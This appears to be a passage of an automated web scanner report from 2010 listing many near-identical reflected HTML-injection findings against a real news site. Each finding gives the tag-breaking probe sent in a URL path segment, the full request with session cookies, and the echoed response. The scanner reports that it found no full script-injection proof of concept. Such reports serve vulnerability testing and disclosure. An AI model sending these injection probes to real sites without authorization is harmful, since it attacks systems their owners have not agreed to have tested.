<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_20095f59a"><a>29622920453"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3559f"><a>424f9e8e273 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue3559f"><a>424f9e8e273/15-06/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=238 Expires: Mon, 22 Nov 2010 01:11:11 GMT Date: Mon, 22 Nov 2010 01:07:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue3559f"><a>424f9e8e273 c_15-06"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c00d"><a>15f409df6f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-063c00d"><a>15f409df6f7/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=229 Expires: Mon, 22 Nov 2010 01:11:44 GMT Date: Mon, 22 Nov 2010 01:07:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-063c00d"><a>15f409df6f7"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458e2"><a>0f61dc79ea2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue458e2"><a>0f61dc79ea2/15-07/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Mon, 22 Nov 2010 01:09:46 GMT Date: Mon, 22 Nov 2010 01:05:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue458e2"><a>0f61dc79ea2 c_15-07"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e036a"><a>caa87d80c1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-07e036a"><a>caa87d80c1e/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:10:36 GMT Date: Mon, 22 Nov 2010 01:06:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-07e036a"><a>caa87d80c1e"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de8c"><a>8e425fd640 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue1de8c"><a>8e425fd640/15-08/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29351 Vary: Accept-Encoding Cache-Control: max-age=221 Expires: Mon, 22 Nov 2010 01:09:02 GMT Date: Mon, 22 Nov 2010 01:05:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue1de8c"><a>8e425fd640 c_15-08"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf8b"><a>fce6565d5ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-086cf8b"><a>fce6565d5ba/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:10:06 GMT Date: Mon, 22 Nov 2010 01:06:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-086cf8b"><a>fce6565d5ba"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3418"><a>ce195589fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issuee3418"><a>ce195589fa5/15-09/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=223 Expires: Mon, 22 Nov 2010 01:09:07 GMT Date: Mon, 22 Nov 2010 01:05:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issuee3418"><a>ce195589fa5 c_15-09"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2054"><a>b50705ffc44 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-09a2054"><a>b50705ffc44/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:10:14 GMT Date: Mon, 22 Nov 2010 01:06:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-09a2054"><a>b50705ffc44"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7378"><a>52f5bbca6a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issuea7378"><a>52f5bbca6a4/15-10/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:42 GMT Date: Mon, 22 Nov 2010 01:05:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issuea7378"><a>52f5bbca6a4 c_15-10"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e79ad"><a>9471c5b3eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-10e79ad"><a>9471c5b3eb/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29351 Vary: Accept-Encoding Cache-Control: max-age=234 Expires: Mon, 22 Nov 2010 01:10:22 GMT Date: Mon, 22 Nov 2010 01:06:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-10e79ad"><a>9471c5b3eb"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac69b"><a>f9de393d2ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issueac69b"><a>f9de393d2ac/15-11/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:09:01 GMT Date: Mon, 22 Nov 2010 01:05:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issueac69b"><a>f9de393d2ac c_15-11"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24d8d"><a>4c6530b8720 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-1124d8d"><a>4c6530b8720/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:09:40 GMT Date: Mon, 22 Nov 2010 01:06:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-1124d8d"><a>4c6530b8720"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2a5"><a>a67b1f7302a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue9a2a5"><a>a67b1f7302a/15-12/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:15 GMT Date: Mon, 22 Nov 2010 01:05:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue9a2a5"><a>a67b1f7302a c_15-12"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d16b8"><a>544844ba869 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-12d16b8"><a>544844ba869/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:10:11 GMT Date: Mon, 22 Nov 2010 01:06:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-12d16b8"><a>544844ba869"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8eb"><a>8d7d3783758 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issueec8eb"><a>8d7d3783758/16-01/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Mon, 22 Nov 2010 01:08:42 GMT Date: Mon, 22 Nov 2010 01:05:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issueec8eb"><a>8d7d3783758 c_16-01"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d800f"><a>31d49709012 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-01d800f"><a>31d49709012/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:10:00 GMT Date: Mon, 22 Nov 2010 01:06:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-01d800f"><a>31d49709012"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d5c8"><a>d90cdd2b885 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue8d5c8"><a>d90cdd2b885/16-02/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:15 GMT Date: Mon, 22 Nov 2010 01:05:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue8d5c8"><a>d90cdd2b885 c_16-02"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25886"><a>49703bfc46d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-0225886"><a>49703bfc46d/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
